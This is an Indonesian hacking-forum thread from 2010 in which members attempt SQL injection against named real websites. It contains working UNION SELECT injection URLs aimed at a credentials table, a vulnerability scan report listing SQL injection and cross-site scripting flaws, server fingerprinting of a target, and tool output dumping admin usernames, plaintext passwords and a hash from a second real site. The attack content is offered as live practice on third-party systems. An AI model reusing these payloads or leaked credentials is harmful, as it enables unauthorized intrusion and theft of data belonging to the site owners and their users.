Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

ada yang mau nerusin [SQL Injection]

http://xcode.or.id/forum/viewtopic.php?f=99&t=37599

Page 1 of 2

ada yang mau nerusin [SQL Injection]

Posted: Sun Jan 31, 2010 11:27 am
by adit_coolz
silahkan menuju TKP
http://www.essaygifts.co.za/catalogue-list.php?id=2 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--
maap masih nyoba2,, kalau ada kesalahan saya mohon koreksi dari suhu2 sekalian :kaca:

Re: ada yang mau nerusin [SQL Injection]

Posted: Sun Jan 31, 2010 1:30 pm
by shad.hckr

Code: Select all

http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+SELECT+1,column_name,3,4,5,6+FROM+information_schema.columns+where+table_name=0x6163636573732d636f6e74726f6c2d7573657273--
ayo lanjutin lagi...

Re: ada yang mau nerusin [SQL Injection]

Posted: Sun Jan 31, 2010 5:04 pm
by sinichi
Ga bisa maenan sql, cuma duduk nyimak sambil gelar tikar.. liat para master beraksi

Code: Select all

<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style>table{table-layout:fixed;overflow:hidden;}</style><title>
			Scan Report
		</title>
	</head><body>
		<center>
			<br><br><br><br><br><br><br><br><h1>
				Xcode Scan Report<br>
			</h1><br><br><br><br><br><br><br><br>Made By Sinichi<br><br><br><br><br><br><br><br>Created By Xcode - Web Vulnerability Scanner<br>2010-01-31<div style="page-break-after:always">&nbsp;</div><h2>
				Vulnerability Result
			</h2><table border="1" width="640" cellspacing="0" bordercolordark="009099">
				<tr><td>URL</td><td>Type</td><td>KeyWord</td><td>Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION+SELECT+1,GROUP_CONCAT(column_NAME),3,4,5,6&nbsp;FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x6163636573732d636f6e74726f6c2d7573657273--</td><td>GET</td><td>http://www.essaygifts.co.za/catalogue-list.php?id=<>%3c%3e%253c%253e</td><td>Cross&nbsp;Site&nbsp;Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>Integer</td><td>upload</td><td>SQL&nbsp;Injection&nbsp;Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>GET</td><td>http://www.essaygifts.co.za/product-list.php?id=<>%3c%3e%253c%253e</td><td>Cross&nbsp;Site&nbsp;Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>POST</td><td>http://www.essaygifts.co.za/product-list.php|search=<>%3c%3e%253c%253e</td><td>Cross&nbsp;Site&nbsp;Scripting(Form)</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>Integer</td><td>html</td><td>SQL&nbsp;Injection&nbsp;Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>GET</td><td>http://www.essaygifts.co.za/product.php?id=<>%3c%3e%253c%253e</td><td>Cross&nbsp;Site&nbsp;Scripting(URL)</td></tr><tr><td></td></tr>
			</table><br>
		</center>
	</body>
</html>

Re: ada yang mau nerusin [SQL Injection]

Posted: Sun Jan 31, 2010 8:34 pm
by SeiM
Belum Ngerti

:sakit:

Re: ada yang mau nerusin [SQL Injection]

Posted: Sun Jan 31, 2010 10:55 pm
by shad.hckr
ayo semangat.. search di forum trus praktek di site itu.. wkwkwkwk..

Re: ada yang mau nerusin [SQL Injection]

Posted: Mon Feb 01, 2010 1:21 am
by adit_coolz
ampyun dah,, :circle:
gagal lagi gagal lagi :putusasa:

Re: ada yang mau nerusin [SQL Injection]

Posted: Mon Feb 01, 2010 7:32 am
by shad.hckr
gagal yang mana mas?? share aja ma kita...

Re: ada yang mau nerusin [SQL Injection]

Posted: Mon Feb 01, 2010 9:37 am
by adit_coolz

Code: Select all

http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+ALL+SELECT+1,GROUP_CONCAT(id,0x3a,password),3,4,5,6+FROM+0x6163636573732d636f6e74726f6c2d7573657273--
eror :putusasa:

Code: Select all

http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION%20SELECT+1,GROUP_CONCAT%28id,0x3a,password%29,3,4,5,6+FROM+access-control-user--
salah lagi :mati:

:pusing:

Re: ada yang mau nerusin [SQL Injection]

Posted: Mon Feb 08, 2010 3:49 am
by racerx
adit_coolz wrote:silahkan menuju TKP
http://www.essaygifts.co.za/catalogue-list.php?id=2 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--
maap masih nyoba2,, kalau ada kesalahan saya mohon koreksi dari suhu2 sekalian :kaca:
hmmm

Server = Apache/1.3.34 (Debian) mod_auth_pam/1.1.1 mod_gzip/1.3.26.1a mod_perl/1.29 mod_fastcgi/2.4.2 AuthMySQL/4.3.9-2 mod_ssl/2.8.25 OpenSSL/0.9.8c
Version = 5.0.32-Debian_7etch11
Powered by = PHP/5.2.0-8+etch16
Attack Type = SQL Union Injection
Current User = [email protected]
Current Database = essayh_db1
Supports Union = yes
Union Columns = 6

Re: ada yang mau nerusin [SQL Injection]

Posted: Wed Feb 10, 2010 1:00 am
by adit_coolz
bingung yang atas.. nyari lagi.. ehh dapet inih...

+] URL:http://www.juventus.co.id/pages.php?id_ ... de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 00:41:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3

[0] dana:dana:
[1] Mazh:abcd:
[2] admin:25c2202579eb40e66c5017012db9ee62:25c2202579eb40e66c5017012db9ee62:

:kaca: :love:
All times are UTC+07:00
Page 1 of 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/